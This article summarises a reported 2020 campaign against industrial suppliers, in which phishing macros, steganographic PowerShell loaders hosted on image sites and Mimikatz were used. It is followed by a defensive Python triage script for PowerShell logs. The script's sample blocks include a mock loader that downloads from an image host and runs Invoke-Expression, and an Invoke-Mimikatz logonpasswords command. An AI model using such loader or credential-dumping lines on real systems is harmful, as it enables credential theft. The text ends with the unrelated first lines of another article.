In May 2020, international equipment suppliers for the industrial sector were targeted in attacks that used unconventional techniques to evade detection, according to researchers at Kaspersky. The attacks began with a phishing email, worded to convey urgency, that carried a Microsoft Office document with an obfuscated macro. Targets were located in Germany, the UK, Italy, and Japan. If the language of the intended victim's Windows installation did not match the language used in the phishing email, the malware would not execute fully, so the samples did little on analysis systems set to another locale. The macro runs a PowerShell script that selects a URL on one of the legitimate public image hosting services imgur[dot]com or imgbox[dot]com and downloads an image in which encrypted data has been hidden using steganography; because the hosts are legitimate and widely used, the download blends in with ordinary web traffic. The decryption key for that data is hidden in the message of an exception that the script raises on purpose, from an error deliberately written into the code. A second PowerShell script then runs a third, which is an obfuscated sample of Trojan-PSW.PowerShell.Mimikatz. With the Mimikatz utility the attackers steal the Windows account credentials stored on the victim's machine. Once a supplier's machine is compromised, the attackers can use that foothold in the supplier's network as a pivot point for later attacks on the supplier's industrial enterprise clients.
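A defender's view of the chain above is the text that PowerShell script block logging (Microsoft-Windows-PowerShell/Operational event 4104) records when each stage runs. The following is an added example, not code from Kaspersky's report or from the samples it describes: a small Python triage that looks for the stages described (locale check, download from an image host, pixel extraction, a key pulled from an exception message, decryption, nested execution, Mimikatz) in script block text. The cmdlet and .NET class names used as indicators are assumptions about how such a loader would typically be written in PowerShell, not strings quoted from the real samples, and the three sample script blocks are constructed for the example.

```python
import re

# Indicators for the stages described in the Kaspersky write-up, keyed on
# the cmdlets and .NET classes a PowerShell loader would typically use for
# each stage. These names are assumptions about how each stage would be
# implemented, not strings quoted from the actual samples.
INDICATORS = {
    "locale_check": re.compile(
        r"Get-Culture|InstalledUICulture|CurrentUICulture|Get-WinSystemLocale", re.I),
    "image_host_download": re.compile(
        r"https?://(?:i\.)?(?:imgur|imgbox)\.com/", re.I),
    "downloader": re.compile(
        r"Net\.WebClient|DownloadData|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
    "pixel_extraction": re.compile(
        r"System\.Drawing\.Bitmap|GetPixel|LockBits", re.I),
    "exception_message_key": re.compile(
        r"catch\s*\{[^}]*\.Exception\.Message", re.I | re.S),
    "decryption": re.compile(
        r"AesCryptoServiceProvider|RijndaelManaged|Security\.Cryptography\.Aes", re.I),
    "nested_execution": re.compile(r"Invoke-Expression|\bIEX\b", re.I),
    "mimikatz": re.compile(r"mimikatz|sekurlsa|logonpasswords", re.I),
}


def match_indicators(script_block):
    """Return the sorted names of every indicator found in one script block."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(script_block))


def is_suspicious(hits, threshold=3):
    """A Mimikatz string is enough on its own; otherwise require several
    stages of the chain, so that ordinary download-and-install scripts,
    which trip only the downloader indicator, are not flagged."""
    return "mimikatz" in hits or len(hits) >= threshold


def triage(events):
    """Return (event id, hits) for every event that is_suspicious()."""
    flagged = []
    for event in events:
        hits = match_indicators(event["script"])
        if is_suspicious(hits):
            flagged.append((event["id"], hits))
    return flagged


# Constructed sample script blocks, not captured samples. Event 1 is a benign
# software install; event 2 mimics the chain described above (locale gate,
# image download, LSB extraction, key from an exception message, AES,
# nested execution); event 3 is a bare Mimikatz invocation.
SAMPLE_EVENTS = [
    {"id": 1, "script": r"""
$wc = New-Object Net.WebClient
$wc.DownloadFile('https://intranet.example.local/tools/agent.msi', 'C:\Temp\agent.msi')
Start-Process msiexec.exe -ArgumentList '/i C:\Temp\agent.msi /qn'
"""},
    {"id": 2, "script": r"""
if ((Get-Culture).Name -ne 'de-DE') { exit }
$img = (New-Object Net.WebClient).DownloadData('https://i.imgur.com/example.png')
$bmp = New-Object System.Drawing.Bitmap (New-Object IO.MemoryStream(,$img))
$bits = foreach ($x in 0..($bmp.Width - 1)) { $bmp.GetPixel($x, 0).B -band 1 }
try { [int]::Parse('not a number') } catch { $key = $_.Exception.Message }
$aes = New-Object Security.Cryptography.AesCryptoServiceProvider
Invoke-Expression $decoded
"""},
    {"id": 3, "script": r"""
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
"""},
]

if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(hits)}")
```

Static string matching like this is defeated by obfuscation of the script file itself, which is why it is worth running over script block logs rather than over files on disk: PowerShell logs each script block as it is invoked, so the de-obfuscated stages that reach Invoke-Expression appear as their own 4104 events, and the second- and third-stage scripts in the chain above would each be logged in the clear.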
By Anthony Zampino

Introduction

Leading up to the most recent Russian invasion of Ukraine in